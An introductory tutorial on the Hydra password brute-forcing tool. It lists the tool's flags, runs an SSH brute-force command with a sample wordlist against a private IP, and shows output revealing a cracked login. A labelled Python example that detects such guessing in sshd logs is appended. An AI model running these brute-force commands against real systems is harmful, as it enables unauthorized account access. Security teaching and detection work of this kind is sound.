Hydra supports the Telnet, HTTP/HTTPS form, SSH, MySQL, PostgreSQL, MSSQL, SMB, LDAP2 and LDAP3, FTP, SNMP, CVS and VNC services, among others.
The tool comes fully installed and configured on BackTrack (graphical interface included); if you do not have it installed, just download the source code and compile it on any distribution.
To do so, go to: http://www.thc.org/thc-hydra
Below are some parameters:
-R: Restores aborted/crashed sessions.
-S: Secure connection using SSL, if needed.
-s: Specifies the port on which Hydra will establish the connection.
Syntax:
# hydra -l username -p password -t threads IP protocol
# hydra -L lista -P lista -t threads IP protocol
Explanation:
-l: Name/login of the target;
-L: Loads a list of target names/logins (one per line);
-p: Specifies a single password;
-P: Loads a list of passwords (one per line);
-e: Extra checks: 'n' tests a blank password, 's' tests the username as the password;
-C: Loads a file containing user:password entries. The user:password format is equivalent to -L/-P;
-M: Loads a list of target servers (one per line);
-o: Saves the passwords found to the file you specify;
-f: Makes the program stop when a password or user is found;
-t: Limits the number of requests at a time (default: 16);
-w: Sets the maximum time in seconds to wait for a response from the server (default: 30s);
-v / -V: Verbose mode. 'V' shows every attempt.
Below is an example with the SSH protocol:
# hydra -L /tmp/wordlist.txt -P /tmp/wordlist.txt 192.168.0.101 ssh
It will run a brute-force with the users in the list and the passwords in the list "wordlist.txt" against the server whose IP is: 192.168.0.101
Well, below is a cat of my "wordlist.txt":
# cat wordlist.txt
darlan
hugo
diogo
danilo
paula
rosi
1234
mudar1234
P@ssw0rd
coracao
teste
teste123
root
root123
tux123
123tux
Hydra output:
# hydra -L /tmp/wordlist.txt -P /tmp/wordlist.txt 192.168.0.101 ssh
Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2012-09-03 15:17:16
WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] 16 tasks, 1 servers, 256 login tries (l:16/p:16), ~16 tries per task
[DATA] attacking service ssh on port 22
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
[22][ssh] host: 192.168.0.101 login: darlan password: tux123 // HERE IT IS!
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting
Note that it tests several combinations and returns Timeout when it cannot complete the authentication.
However, when it succeeds, it returns:
[port][protocol] host: IP login: "correct login" password: "correct password"
[22][ssh] host: 192.168.0.101 login: darlan password: tux123
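Seen from the server side, a run like the one above leaves a burst of failed logins for many usernames from a single address, followed by one success. The following is an added example, not part of the original post, that flags that pattern in sshd logs; the log lines, the source address 192.168.0.50 and the thresholds are constructed for illustration and assume OpenSSH's default message format.

```python
import re
from collections import defaultdict

FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")
ACCEPTED = re.compile(r"Accepted \S+ for (\S+) from (\S+) port \d+")

def analyze(lines, min_failures=10, min_users=3):
    """Return (guessing_sources, logins_after_guessing) for sshd log lines."""
    failures = defaultdict(int)   # source IP -> failed attempts so far
    users = defaultdict(set)      # source IP -> distinct usernames tried
    hits = []

    def guessing(src):
        return failures[src] >= min_failures and len(users[src]) >= min_users

    for line in lines:
        m = FAILED.search(line)
        if m:
            user, src = m.groups()
            failures[src] += 1
            users[src].add(user)
            continue
        m = ACCEPTED.search(line)
        # A success from a source that was just guessing means a password was found.
        if m and guessing(m.group(2)):
            hits.append((m.group(2), m.group(1), failures[m.group(2)]))
    return sorted(s for s in failures if guessing(s)), hits

def sample_log():
    """Constructed log: the address 192.168.0.50, PIDs and times are made up."""
    names = ["darlan", "hugo", "diogo", "danilo", "paula", "rosi", "teste", "root"]
    lines = []
    for i, user in enumerate(names):
        tag = "" if user in ("darlan", "root") else "invalid user "
        for j in range(3):  # three wrong guesses per name
            n = i * 3 + j
            lines.append(f"Sep  3 15:17:{16 + n:02d} srv sshd[{2000 + n}]: Failed password "
                         f"for {tag}{user} from 192.168.0.50 port {40000 + n} ssh2")
    lines += [
        "Sep  3 15:17:41 srv sshd[2030]: Accepted password for darlan from 192.168.0.50 port 40030 ssh2",
        # Ordinary user: one typo, then a correct login; must not be flagged.
        "Sep  3 15:20:05 srv sshd[2040]: Failed password for paula from 192.168.0.7 port 51000 ssh2",
        "Sep  3 15:20:09 srv sshd[2041]: Accepted password for paula from 192.168.0.7 port 51002 ssh2",
    ]
    return lines

if __name__ == "__main__":
    sources, hits = analyze(sample_log())
    print("guessing sources:", sources)
    for src, user, n in hits:
        print(f"ALERT {src} logged in as {user} after {n} failed attempts")
```

An account flagged this way should have its password reset and its sessions reviewed; disabling password authentication in favour of keys removes this class of guessing entirely.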
Well, this was just an introduction.
Best regards to all. :)
Tip previously published at: